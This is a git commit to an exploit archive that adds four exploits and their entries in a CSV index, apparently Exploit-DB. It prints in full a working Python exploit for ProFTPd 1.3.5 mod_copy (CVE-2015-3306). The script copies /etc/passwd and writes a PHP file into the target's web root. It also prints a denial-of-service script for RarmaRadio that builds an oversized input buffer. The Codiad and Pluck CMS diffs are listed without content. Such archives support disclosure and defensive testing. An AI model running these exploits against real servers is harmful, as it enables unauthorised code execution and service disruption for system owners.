DB: 2021-05-27

4 changes to exploits/shellcodes RarmaRadio 2.72.8 - Denial of Service (PoC) ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) Codiad 2.8.4 - Remote Code Execution (Authenticated) (3) Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)
2021-05-27 05:01:52 +00:00 · 2021-05-27 05:01:52 +00:00 · aa3c54402b
commit aa3c54402b
parent 8ceb48a8ee
5 changed files with 339 additions and 0 deletions
--- a/exploits/linux/remote/49908.py
+++ b/exploits/linux/remote/49908.py
@ -0,0 +1,46 @@
+# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
+# Date: 25/05/2021
+# Exploit Author: Shellbr3ak
+# Version: 1.3.5 
+# Tested on: Ubuntu 16.04.6 LTS
+# CVE : CVE-2015-3306
+
+#!/usr/bin/env python3
+
+import sys
+import socket
+import requests
+
+def exploit(client, target):
+    client.connect((target,21)) # Connecting to the target server
+    banner = client.recv(74)
+    print(banner.decode())
+    client.send(b'site cpfr /etc/passwd\r\n')
+    print(client.recv(1024).decode())
+    client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC.
+    print(client.recv(1024).decode())
+    client.send(b'site cpfr /proc/self/fd/3\r\n')
+    print(client.recv(1024).decode())
+    client.send(b'site cpto /var/www/html/test.php\r\n')
+    print(client.recv(1024).decode())
+    client.close()
+    print('Exploit Completed')
+
+def check(url):
+    req = requests.get(url) # Requesting the written PoC php file via HTTP
+    if req.status_code == 200:
+        print('[+] File Written Successfully')
+        print(f'[+] Go to : {url}')
+    else:
+        print('[!] Something Went Wrong')
+        print('[!] Directory might not be writable')
+
+def main():
+    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    target = sys.argv[1]
+    exploit(client, target)
+    url = 'http://' + target + '/test.php'
+    check(url)
+
+if __name__ == '__main__':
+    main()
--- a/exploits/multiple/webapps/49907.py
+++ b/exploits/multiple/webapps/49907.py
--- a/exploits/php/webapps/49909.py
+++ b/exploits/php/webapps/49909.py
--- a/exploits/windows/dos/49906.py
+++ b/exploits/windows/dos/49906.py
@ -0,0 +1,29 @@
+# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
+# Date: 2021-05-25
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
+# Version: 2.75.8
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program RarmaRadio
+# Click in Edit and select Settings
+# Click in Network option
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Lambda.txt"
+# Paste the content in the fields Username, Server, Port and User Agent
+# Click in OK
+# End :)
+
+
+buffer = 'Ñ' * 100000
+
+try: 
+    file = open("Lambda.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6783,6 +6783,7 @@ id,file,description,date,author,type,platform,port
 49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows,
 49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios,
 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
+49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -18470,6 +18471,7 @@ id,file,description,date,author,type,platform,port
 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,
 49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux,
 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris,
+49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -44069,3 +44071,5 @@ id,file,description,date,author,type,platform,port
 49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",2021-05-24,"Bastijn Ouwendijk",webapps,php,
 49904,exploits/php/webapps/49904.txt,"Gadget Works Online Ordering System 1.0 - 'Category' Persistent Cross-Site Scripting (XSS)",2021-05-25,"Vinay H C",webapps,php,
 49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php,
+49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
+49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,